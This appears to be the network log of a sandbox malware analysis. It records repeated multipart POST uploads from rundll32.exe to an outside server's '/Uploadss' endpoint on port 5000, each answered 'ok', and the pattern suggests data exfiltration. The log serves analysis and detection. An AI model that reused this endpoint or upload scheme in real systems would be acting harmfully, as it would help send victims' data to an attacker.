                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.649220172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:13.680289984 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
                              Jul 22, 2024 15:59:14.698188066 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:14 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.649221172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:14.720798016 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
                              Jul 22, 2024 15:59:15.692922115 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:15 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.649222172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:15.718911886 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
                              Jul 22, 2024 15:59:16.686419010 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:16 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.649223172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:16.717490911 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
                              Jul 22, 2024 15:59:17.702600956 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:17 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.649224172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:17.728193998 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
                              Jul 22, 2024 15:59:18.687912941 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:18 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.649225172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:18.711544037 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
                              Jul 22, 2024 15:59:20.105045080 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:19 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.649226172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:20.153347969 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
                              Jul 22, 2024 15:59:21.120584965 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:20 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.649227172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:21.150154114 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
                              Jul 22, 2024 15:59:22.139071941 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:21 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.649228172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:22.200515985 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
                              Jul 22, 2024 15:59:23.179164886 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:22 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.649229172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:23.195195913 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
                              Jul 22, 2024 15:59:24.193551064 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:23 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.649230172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:24.224888086 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
                              Jul 22, 2024 15:59:25.175795078 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:24 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.649231172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:25.200371981 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
                              Jul 22, 2024 15:59:27.644654989 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:27 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.649232172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:27.670627117 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
                              Jul 22, 2024 15:59:30.136130095 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:29 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.649234172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:30.193425894 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
                              Jul 22, 2024 15:59:31.197036028 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:30 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.649235172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:31.212780952 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
                              Jul 22, 2024 15:59:32.395958900 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:32 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.649236172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:32.420713902 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
                              Jul 22, 2024 15:59:33.371445894 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:33 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              50192.168.2.649237172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:33.395796061 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
                              Jul 22, 2024 15:59:34.795245886 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:34 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              51192.168.2.649238172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:34.823381901 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
                              Jul 22, 2024 15:59:35.794148922 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:35 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              52192.168.2.649239172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:35.818789959 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
                              Jul 22, 2024 15:59:37.000550032 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:36 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              53192.168.2.649240172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:37.014770031 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
                              Jul 22, 2024 15:59:37.946372032 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:37 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              54192.168.2.649241172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:37.973495960 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
                              Jul 22, 2024 15:59:38.933866978 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:38 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              55192.168.2.649242172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:38.961004972 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
                              Jul 22, 2024 15:59:40.042105913 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:39 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              56192.168.2.649243172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:40.064085007 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
                              Jul 22, 2024 15:59:41.061228991 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:40 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              57192.168.2.649244172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:41.134223938 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
                              Jul 22, 2024 15:59:42.093332052 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:41 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              58192.168.2.649245172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:42.109009981 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
                              Jul 22, 2024 15:59:43.078140020 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:42 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              59192.168.2.649246172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:43.105374098 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
                              Jul 22, 2024 15:59:44.096829891 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:43 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              60192.168.2.649247172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:44.124931097 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
                              Jul 22, 2024 15:59:47.575844049 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:47 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              61192.168.2.649248172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:47.604772091 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
                              Jul 22, 2024 15:59:48.736963034 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:48 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              62192.168.2.649249172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:48.753058910 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
                              Jul 22, 2024 15:59:49.711147070 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:49 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              63192.168.2.649250172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:49.750644922 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
                              Jul 22, 2024 15:59:50.724616051 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:50 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              64192.168.2.649251172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:50.756093025 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
                              Jul 22, 2024 15:59:51.673804045 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:51 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              65192.168.2.649252172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:51.697841883 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
                              Jul 22, 2024 15:59:52.647212029 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:52 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              66192.168.2.649253172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:52.678925037 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
                              Jul 22, 2024 15:59:53.650727034 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:53 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              67192.168.2.649254172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:53.678493023 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
                              Jul 22, 2024 15:59:54.849045038 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:54 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              68192.168.2.649255172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:54.874304056 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
                              Jul 22, 2024 15:59:55.863974094 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:55 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              69192.168.2.649256172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:55.896068096 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
                              Jul 22, 2024 15:59:56.859682083 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:56 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              70192.168.2.649257172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:56.924189091 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
                              Jul 22, 2024 15:59:58.111783981 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:57 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              71192.168.2.649258172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:58.137052059 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
                              Jul 22, 2024 15:59:59.418570042 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 13:59:59 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              72192.168.2.649259172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 15:59:59.445729017 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
                              Jul 22, 2024 16:00:00.404954910 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:00 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              73192.168.2.649260172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:00.443661928 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
                              Jul 22, 2024 16:00:01.389868021 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:01 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              74192.168.2.649261172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:01.414390087 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
                              Jul 22, 2024 16:00:02.348699093 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:02 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              75192.168.2.649262172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:02.369635105 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
                              Jul 22, 2024 16:00:03.288084984 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:03 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              76192.168.2.649263172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:03.316319942 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
                              Jul 22, 2024 16:00:04.280101061 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:04 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              77192.168.2.649264172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:04.304373980 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
                              Jul 22, 2024 16:00:05.531369925 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:05 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
